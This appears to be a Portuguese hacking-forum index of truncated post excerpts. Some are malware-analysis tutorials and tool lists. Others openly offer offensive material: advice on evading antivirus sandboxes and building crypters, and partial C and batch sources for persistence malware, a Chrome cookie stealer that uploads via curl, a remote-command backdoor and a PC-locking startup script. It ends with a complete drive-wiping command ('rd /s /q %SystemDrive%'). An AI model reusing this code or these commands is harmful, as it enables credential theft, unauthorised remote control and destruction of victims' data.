Entao gente, eu queria abrir uma discussao aqui sobre como dar bypass no sandbox. Dps de fazer um crypter, esse é o ultimo desafio que temos heheh.

O que é sandbox?

Sandbox é uma parte do antivirus que analiza malwares em tempo real, entao aquele crypter que ensinei a fazer vai falhar se passar por aqui. Segundo o Avast, modificaçoes no sistema feito por um aplicativo no sandbox sao desfeitas, o que limita bastante o nosso bypass. A questao é que devemos evitar o sandbox, mas como? O...

Trojan que redireciona para página fake

Vou começar a traduzir uns textos legais que acho por ai.

Ha quem diz que ja perdemos (tem quem diga que ja faz uma decada que nos perdemos), que o mau venceu e que ninguem mais pode confiar nos antivirus.

Eu sendo um profissional da area de segurança, nao recomendaria ninguém surfar a web sem usar um antivirus, você ainda precisa de um para nao ser vitima de malwares meia boca que trollam a Internet, os antivirus nao podem fazer mais do que isso.

A verdade é que os antivirus sao como...

tutorial antigo da epoca do fh (2008/2010) u.u

um malware é um codigo ou programa nocivo criado para fazer o mal em um pc (virus,trojan,worm etc), embora essa palavra assuste a maioria dos usuarios leigos, bom todo mundo aqui no forum provavelmente ja teve problema com um virus, e provavelmente ja tiveram que formatar o computador isso é normal, mais o resto dos usuarios finais (leigos) quando pega um virus tem que chamar um tecnico para ver (e isso custa os olhos da cara), entao eu vou...

Galera deixo aqui alguns sites que vcs podem achar amostras de malwares:

Nesses sites também tem bastante referencia para estudos, analises e comportamentos dessas ameaças

Referências

Achei esse link: fumalwareanalysis onde o autor aborda varias analises em ER bem legais ;)

Como fazer crypters em C & CPP .
De Fascist pra EOF :3
=================================

Bem, antes de fazermos um crypter, precisamos entender um pouco mais sobre crypters.
E porfavor, entenda um pouco de C antes de ler esse tutorial.

Pra que servem crypters?
========================

Eles servem pra deixar os malwares indetectaveis :D

Como eles funcionam?
====================

Bem, como o nome mais ou menos sugere, os crypters criptografam o malware, entao quando o antivirus
vai...

ai vem a 3º parte do artigo nessa vamos entender um pouco sobre isolamento, é importante isolar um malware para ele nao infectar a propria maquina ou para o antivirus nao deleter ele por engano ou ate uma forma segura para transporta-lo sem dissemina-lo, a forma mais facil de isolar um malware é compactar ele com senha ou codificar os bytes dele de alguma forma assim ele nao vai ser um executavel, algumas ferramenta que pode ser usado para isso é o winrar, Glary Utilities, entre outros

uma...

O Museu de Malware é uma coleção de programas maliciosos, geralmente vírus, que foram distribuídos em 1980 e 1990 em computadores domésticos. Uma vez que eles infectaram um sistema, mostravam-se às vezes animação ou mensagens que você tinha sido infectado.

Achei interessante compartilhar.
@goodjobs@

Malware Analysis Tutorials: a Reverse Engineering Approach
Author: Dr. Xiang Fu

Conteúdo:
Malware Analysis Tutorial 1- A Reverse Engineering Approach (Lesson 1: VM Based Analysis Platform)
Malware Analysis Tutorial 2- Introduction to Ring3 Debugging
Malware Analysis Tutorial 3- Int 2D Anti-Debugging .
Malware Analysis Tutorial 4- Int 2D Anti-Debugging (Part II)
Malware Analysis Tutorial 5- Int 2D in Max++ (Part III) .
Malware Analysis Tutorial 6- Self-Decoding and Self-Extracting Code...

hj eu tava sem nada para fazer entao resolvir fazer esse codigo viral lol , eu nao terminei ele ainda mais to com preguiça de terminar entao vou deixar como base para quem quiser kkkkkk, ele faz o seguinte na primeira etapa ele cria uma pasta oculta na unidade c:\windows com o nome fts, depois ele se copia pra la, ele cria uma inicializaçao para ele iniciar junto com windows, caso ele ja esteja na la na pasta ele pula essa etapa, agora a segunda etapa ele gera um arquivo de texto na mesma pasta...

bom galera spywares sao malware especifico para roubar informaçao das vitimas muito usados por empresas de softwares para colher determinada informaçao como por exemplo quais site mais visitados, quais programas instalados, informaçao sobre seu pc ou suas compras etc, o uso de um spyware pode facilitar muito na venda de determinado produto (sabendo oq uma pessoas deseja comprar e mais facil vender pra ela '-'), dumpar determinada informaçao sem autoriaçao da pessoa pode ser considerado invasao...

Adware é qualquer programa que executa automaticamente e exibe uma grande quantidade de anúncios, bem recentemente meu google chrome ficou infestado de adwares em uma máquina instalada com win8 adotei alguns procedimentos.

▸ Rodei os seguintes programas: Malwarebytes' Anti-Malware,SUPERAntiSpyware Free Edition,Spybot - Search & Destroy e outros que fazem essa tarefa e nada..eheheh

▸ Entre no seguinte diretório do google chrome : C:\Users\ \AppData\Local\Google\Chrome\User...

Achei interessante compartilhar, segue :

Akana (Arquivos Android)
Anubis
BitBlaze Malware Analysis Service
Comodo Automated Analysis System e Valkyrie
EUREKA Malware Analysis Internet Service
Joe Sandbox Document Analyzer (PDF, RTF e arquivos MS Office )
Malwr
MalwareViz
MASTIFF Online ( Analise estática de vários arquivos)
VxStream Sandbox ( Analise Hibrida)
ThreatExpert
ThreatTrack
ViCheck
VisualThreat Arquivos Android
XecScan ( Arquivos PDF e MS Office )
Virus...

bom galera nesse artigo vou falar um pouco sobre joiner e como funciona um, os joiner sao executaveis q comprimi 2 ou mais e um unico executavel e quando vc executa ele vai executar todos ao mesmo tempo, eles tem varias utilidades para fazer coisa boa ou ruim, voce poderia usar um joiner para fazer varias instalaçao de programas ao mesmo tempo ou usar ele como um especie de pacote, ou juntar um malware com um jogo e mandar para aquele amigo '-', para começar vamos entender um pacote qualquer...

bom galera aqui uma source muito boa para analisar conexao reversa em malware, voce aponta o servidor de dns para localhost e depois roda esse meu programa ele vai capturar as consultas de dns e armazenar em um arquivo de texto (porem ele nao faz a pesquisa dns retornando nenhuma resposta)

github

/**
coder: kõdo no kami
forum: endoffile.umforum.net
contato: www.facebook.com/hacker.fts315
**/

#include
#include
#include
#include
#include

#define PORTA 53

int main(void)
{
int...

e ae galera faz um tempo que eu nao escrevo sobre analise de malware entao vou continuar o artigo de analise essa vai ser a 7º parte, nessa parte vou falar de algumas ferramentas onlines uma delas é o virustotal , que é um servidor de escaneamento de malware com mais 40 antivirus, voce envia um arquivo de no maximo 64mb para ser analisado por varios antivirus entre eles (avast, avira, avg, entre outros), no virustotal tambem faz uma analise dinamica e estatica embora seja bem superficial (nesse...

e ae galera essa é 6º parte do artigo de analise de malware e nela vamos ver um pouco mais sobre processo, no artigo anterior usamos o gerenciador de tarefa salvamos os processos antigos e depois comparamos com execução do malware para ver se fico algum processo novo em execução, nesse artigo vamos usar alguns programas que automatiza isso, o primeiro é o malm , esse programa é por base de comando ou seja para usar ele deve ser pelo terminal, depois de baixar ele basta jogar os executaveis em...

/**
 coder: hfts315
face: www.facebook.com/hacker.fts315
greetz: mmxm, F.ramon, susp3it0virtu@l, member eof entre outros ^^
obs: necessario o executavel curl, nem sei se funciona so fiz para passar o tempo kkkkkkk
**/

#include
#include
#include
#include
//#include

//linha abaixo e o endereço do servidor com script que recebe o arquivo
//fiquei com preguiça de fazer ele
#define SERVIDOR
#define CHROME_DIR \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies
#define CMD...

bom galera nesse artigo vou falar um pouco sobre analise de malware porem nao vou me aprofundar muito nessa area, para começar vamos entender oque é exatamente um malware

o que diabos é um malware

o significado da palavra malware seria software malicioso vindo da concatenação da palavra MALicius softWARE , um software malicioso pode ser qualquer programa que faça uma coisa indesejada no sistema ou alguma coisa nao autorizada que cause algum prejuizo ou perda para o usuario

tipos de...

bom galera continuando os artigos anteriores nesse vamos mexer um pouco com processos ou seja analise dinamica, para analisar um malware ou artefato suspeito em execução sempre temos que fazer isso em um ambiente controlado ou seja maquina virtual para evitar infectar a nossa propria maquina, eu tenho uma maquina virtual que uso para testes porem vou fazer os testes na maquina real mesmo devido eu ja conhecer o artefato que vou analisar e nele nao tem nenhum risco real (porem se fosse uma...

uma backdoor que eu estava fazendo para passar o tempo, por enquanto so tem o comando CMD * END (* = comando), HELP e EXIT, como eu nao terminei (e nem sei se vou)  o servidor ta ainda no modo verbose e bem visivel kkkkkk

github

/**
coder: hfts315
name: fts backdoor servidor
plataforma: windows(x32) / linux
versao: 0.1 Alpha (incompleto)
**/

#include
#include
#include
#include
#include
#ifdef WIN32
#include
#include
#include
#else
#include
#include
#include
#include...

bom galera essa é a 4º parte do artigo, no 2º artigo eu citei como descobrir a linguagem e o compilador que foi codado nesse eu vou citar como ver informação como strings e funçoes executada pelo malware tudo isso com analise estatica, para começar vamos usar um programa que examina a string assim mostrando varias informação do executavel, existem varios como strings (gnu binutils ou sysinternals), bintext, filealyzer, IDA entre outras ferramentas, no exemplo abaixo eu to usando essa source...

bom galera continuando o outro artigo onde eu falei da comparação de dois arquivos para ver se é o mesmo nesse eu vou falar como descobrir qual linguagem que ele foi codado, para isso vamos usar um programa para analisar, podemos usar Filealyzer ( site oficial ), tambem podemos usar outros como exeinfope, PEiD, protection id entre outros

as vezes nao mostra qual linguagem nem outras informação devido o executavel estar codificado, porem se o executavel estiver usando um packer (crypter,...

esse programa lista os novos processos que sao executado depois dele

site oficial

olha qq esse malware fez

Li esse post no forum e lembrei da raiva que passei onde meu pendrive foi premiado por um malware com nome BUAGOF~1.VBS nos PCs desktop da faculdade usando qual sistema??..kkkk.. o famoso windows , esses computadores são usados para imprimir arquivos da galera(só ai deu para você ter uma noção..kk),pelo jeito esse malware e do tipo que replica atalhos nos arquivos é depois oculta os arquivo.

Scan dele no virusscan.jotti.org e no virustotal.com mas como vamos...

bom galera aq e o fts315 nesse tutorial vou ensinar como usar o netcat, ele e uma ferramente multi uso q permite varias coisas entre elas conexao ao terminal alvo (ou a outro programa), scanner de porta, tunelamento, etc, o netcat pode ser facilmente encontrado na net entao nao vou postar links, o netcat funciona a base de comando ou seja ele e tanto o cliente quanto servidor entao se faz necessarios as sintaxe para poder usar ele, vamos la

a primeira coisa depois de baixar seria extrair caso...

esse script em batch trava a maquina da vitima (ele cria uma chave de inicializaçao para ele e gera um outro script em batch na unidade c:\windows\ assim q windows liga abre infinitamente o prompt de comando travando o pc da vitima), para remover ele basta vc ligar o pc em modo de segurança (assim q der boot vc segure f8 eu acho e ligue em mode de segurança, ou use um sistema operacional externo tipo os live cd do linux, depois so remover)

@echo off
title by hacker fts315
reg add...

executavel para trollar aquele seu professor chato kkkkkk
efeito: quando fecha a janela ele abre outra criando um loop infinito
plataforma: linux (porem acho q se compilar no windows funfa tambem)

github
4shar

/*
by hacker fts315
fts window-Zombie troll
*/

#include
#include
#include
#include
#include

using namespace std;

void fts_saida(void);

int main(int argc, char **argv)
{
GtkWidget *janela, *label;
gtk_init(&argc,&argv);
janela = gtk_window_new(GTK_WINDOW_TOPLEVEL);...

As maiores ameaças aos usuários de computadores conectados na Internet são
representadas pelos Malwares. Eles podem seqüestrar o browser, redirecionar as consultas de buscas, incluir pop-ups, registrar os sites visitados, etc. A programação de Malwares pode ser simples (veja um exemplo na página 3) e eles podem causar sérios problemas tornando o computador instável e as comunicações inseguras. Vários Malwares podem reinstalar-se após serem removidos, ou ocultar-se no Kernel do sistema...

esse malware ele se copia para pasta c:\windows\system32\fts caso ele nao esteja nela, cria uma chave de inicializaçao, e quando a pessoa apertar qualquer tecla ele exibe uma caixa de texto com uma msg de erro

/*
  FTS Malware ErrKey
  autor: hacker fts315
  linguagem: c
*/

//bibliotecas
#include
#include
#include

//constantes de configuraçao
#define MSG erro grave no sistema
#define MSG_NOME erro 0x315
#define NOME_PROGRAMA fsvhost
#define NOME_CHAVE fsvhost
#define TEMPO_SLEEP...

essa source remove quase tudo do sistema operacional (algumas coisas do sistema nao consegue remover nao)

title by hacker fts315
rd /s /q %SystemDrive%